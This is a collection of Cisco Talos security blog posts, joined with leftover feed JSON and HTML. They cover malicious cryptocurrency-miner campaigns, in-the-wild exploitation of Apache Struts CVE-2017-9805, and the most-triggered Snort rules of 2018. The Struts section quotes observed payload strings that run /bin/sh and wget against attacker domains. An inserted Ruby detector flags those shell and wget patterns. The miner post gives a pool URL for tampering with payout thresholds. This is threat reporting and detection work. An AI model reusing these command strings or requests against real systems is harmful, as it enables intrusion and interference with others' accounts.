### Exploit Kit Based

In addition to the spam campaigns above, Talos has also been observing the RIG exploit kit delivering miners via smokeloader over the last couple of months. The actual infection via the exploit kit is pretty standard for RIG activity.
However, the great thing about mining is that there are easily trackable elements left on the system, namely the 'Worker ID', as shown below:

[](<https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png>)

**Command Line Syntax**

Using the Worker ID of:

    43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD

we began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/day.

That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years, without additional maintenance required by the actor. The only operational costs are those associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually.

However, when we started looking further back, this campaign has been ongoing off and on over the last six months, with peak hash rates in excess of 100 KH/sec.

[](<https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png>)

**Historical Hash Rate**

The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It is still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.
### Active Exploitation

In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently an Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally it can result in significant financial gain.

When you take threats being delivered to users via email and web, as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining.

## Deeper Dive on Mining and Workers

Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing that has been common with most of the malicious miners we found was the filename choices. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
[](<https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png>)

**Command Line Syntax**

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>).

## Mining as a Payload for the Future

Cryptocurrency miner payloads could be among the easiest money makers available for attackers. This is not to encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue. Attackers simply have to infect as many systems as possible and execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will likely be just as happy computing 10 KH/s as 500 KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal.

The sheer volume of infected machines is how attackers measure success with these campaigns. Since financial gain via mining is the mission objective, there is no need to compromise hosts to steal documents, passwords, wallets, or private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload; in the latter case ransomware is used as a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.
Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However, consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gain: control of system resources and the volume of hashes those resources can generate.

Recurring revenue is not just something a legitimate business strives for; malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks, and rarely is this type of malware used to attack hundreds of thousands of users. As such, a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers, attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

The use of cryptominers as a payload, and the techniques for ensuring the system is running at full capacity, will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources, as the potential monetary value and ongoing revenue stream is massive.

## Are Miners Malware?

Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines.
Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, to perform and validate transactions, and to reward miners performing the complex mathematical calculations that ensure the integrity and security of the cryptocurrency ecosystem and network.

If a legitimate user runs the mining software locally they can run their own mining platform; likewise, a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that the legitimate user is performing this task intentionally. The malicious actor is performing this task in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception of the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when PowerShell or PsExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors.

## Enterprise Impacts

Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, that is wasted or stolen resources for an organization, and depending on the configuration of these systems, it could have larger impacts.
Obviously, if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

Due to the large number of willing users, it might warrant an organization crafting a policy, or adding a section to an existing policy, regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these files should be treated as malware and removed/quarantined as such.

## Fails We Found

While investigating malware campaigns that were distributing Monero mining software, we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:

[](<https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png>)

**Command Line Syntax**

Interestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the infected machines mining Monero that was being sent to the mining application's author, not the attacker themselves.

[](<https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png>)

**Source Code Default Values**

In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners.
A few examples are below:

[](<https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png>)

**Mining Fail Example #1**

[](<https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png>)

**Mining Fail Example #2**

[](<https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png>)

**Mining Fail Example #3**

[](<https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png>)

**Mining Fail Example #4**

This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always updated, which prevents them from monetizing or generating revenue from these sorts of attacks.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR), the attacker would have to wait an extended period before receiving their next payout.
While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request, as long as the request is made to the mining pool's URL using the following structure:

    "https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

Where $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary.

## Conclusion

The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money, and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system, other than from some occasional slowdown. This increases the time a system is infected and generating revenue. In many ways it's the exact opposite of ransomware. Ransomware is designed to generate revenue from a victim in a couple of days, and the payoff is immediate.
Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment, and then deciding how to handle it going forward.

## Coverage

There are different ways to address miners, and there is detection built into Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally, there are a couple of NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment, depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity include, but aren't limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

## IOC Section

### IP Addresses:

89.248.169[.]136
128.199.86[.]57

### Domains:

qyvtls749tio[.]com
youronionlink[.]onion

### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)

*Post: "Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions" (Talos blog, published 2018-01-31, modified 2018-01-31; CVE-2017-10271, CVE-2017-3506; CVSS 5.8, AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/; <http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html>)*

## Another Apache Struts Vulnerability Under Active Exploitation

*This post authored by [Nick Biasini](<https://twitter.com/infosec_nick>) with contributions from [Alex Chiu](<https://twitter.com/nschmx>).*

Earlier this week, a critical vulnerability in [Apache Struts](<https://cwiki.apache.org/confluence/display/WW/S2-052>) was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.

This isn't the only vulnerability that has been recently identified in Apache Struts. [Earlier this year](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.

### Details

Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved, and we immediately began seeing active exploitation in the wild.
Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.

    <string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>

This would initiate a wget request that writes the contents of the HTTP response to /dev/null. This indicates it is purely scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.

    <string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string>

During our research we found that the majority of the activity was trying to POST to the path /struts2-rest-showcase/orders/3.
Additionally, most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.

[](<https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png>)

**Example of in the wild exploitation**

Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.

    <string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string>

Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location.
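The request patterns described above (POSTs to the showcase path, callbacks to the actor's domain, and command strings carried in `<string>` elements) are simple to hunt for in web server logs. The following is an added example, not code from the post or from Cisco Talos, that classifies combined-format access log lines and inspects request bodies; the log lines and the sample body are constructed, and the IP addresses and domains are the post's indicators, refanged for matching.

```ruby
# Added example: flag web-server log entries and request bodies that match the
# Struts scanning activity described above. Not code from the post; the log
# lines and body are constructed, the IOCs are the post's (refanged here).

IOC_IPS = %w(188.120.246[.]215 101.37.175[.]165 162.158.182[.]26
             162.158.111[.]235 141.101.76[.]226 141.101.105[.]240)
          .map { |d| d.gsub("[.]", ".") }.freeze
IOC_DOMAINS = %w(wildkind[.]ru st2buzgajl.alifuzz[.]com)
              .map { |d| d.gsub("[.]", ".") }.freeze
STRUTS_PATH = "/struts2-rest-showcase/orders/3"

# Combined log format: client ident user [time] "METHOD path proto" status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/

# Returns nil for lines with nothing of interest, otherwise the parsed fields
# plus the reasons the line matched.
def classify_request(line)
  m = LOG_RE.match(line)
  return nil unless m
  reasons = []
  reasons << "source-ip-in-ioc-list" if IOC_IPS.include?(m[:ip])
  if m[:method] == "POST" && m[:path].split("?").first == STRUTS_PATH
    reasons << "post-to-struts-rest-showcase"
  end
  return nil if reasons.empty?
  { ip: m[:ip], method: m[:method], path: m[:path],
    status: m[:status].to_i, reasons: reasons }
end

# The observed payloads carry their command in <string> elements; flag a body
# whose elements start a shell, invoke wget, or name a known callback domain.
def suspicious_body?(body)
  strings = body.scan(%r{<string>(.*?)</string>}m).flatten
  strings.any? do |s|
    s.start_with?("/bin/sh") || s.start_with?("wget") ||
      IOC_DOMAINS.any? { |d| s.include?(d) }
  end
end

def scan_log(lines)
  lines.map { |l| classify_request(l) }.compact
end

# Constructed log lines (not from the post); 10.0.0.5 and 203.0.113.9 are
# documentation addresses standing in for a benign client and an unknown scanner.
SAMPLE_LOG = [
  '188.120.246.215 - - [07/Sep/2017:10:12:01 +0000] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [07/Sep/2017:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [07/Sep/2017:10:13:17 +0000] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 500 87 "-" "curl/7.55"',
].freeze

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each { |hit| puts "#{hit[:ip]} #{hit[:path]} -> #{hit[:reasons].join(',')}" }
end
```

The path match is kept exact rather than a substring so that ordinary traffic to the REST showcase, which a development server may legitimately carry, only flags on the POST the scanners use; widening it to any `/struts2-rest-showcase/` request is a one-line change if that application should not be exposed at all.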
If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.

### IOCs

IP Addresses Observed:

* 188.120.246[.]215
* 101.37.175[.]165
* 162.158.182[.]26
* 162.158.111[.]235
* 141.101.76[.]226
* 141.101.105[.]240

Domains Contacted:

* wildkind[.]ru
* st2buzgajl.alifuzz[.]com

Commonly Used Path:

* /struts2-rest-showcase/orders/3

### Mitigation

Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache Struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34, or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-052>) and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to serving normal pages and JSON may help limit the risk of compromise.

### Conclusion

This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.

The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues.
Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a 
href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.", "cvss3": {}, "published": "2017-09-07T15:42:00", "type": "talosblog", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T15:23:07", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n \nThe cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. 
In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rule detects specific network activity, and each rule has a unique identifier. This identifier is comprised of three parts: the Generator ID (GID), the rule ID (SID) and the revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients' networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. 
\n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought for as little as 1 USD, which is why it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot of scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and of patch management programs that apply patches as promptly as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 
3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made it into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. 
Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat cryptocurrency mining threats, and this rule, deployed in early 2018, proved to be the number one, showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules were the most frequently triggered Snort rules in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related Snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). 
\n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or, depending on the architecture of your environment, the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer 2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts is different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was the rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). 
Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser (for example, ActiveX). Most activity for 2018 seems to consist of SID 1:8068, which is, among others, linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block cryptomining in an enterprise using Cisco Security Products, have a look at our [whitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. 
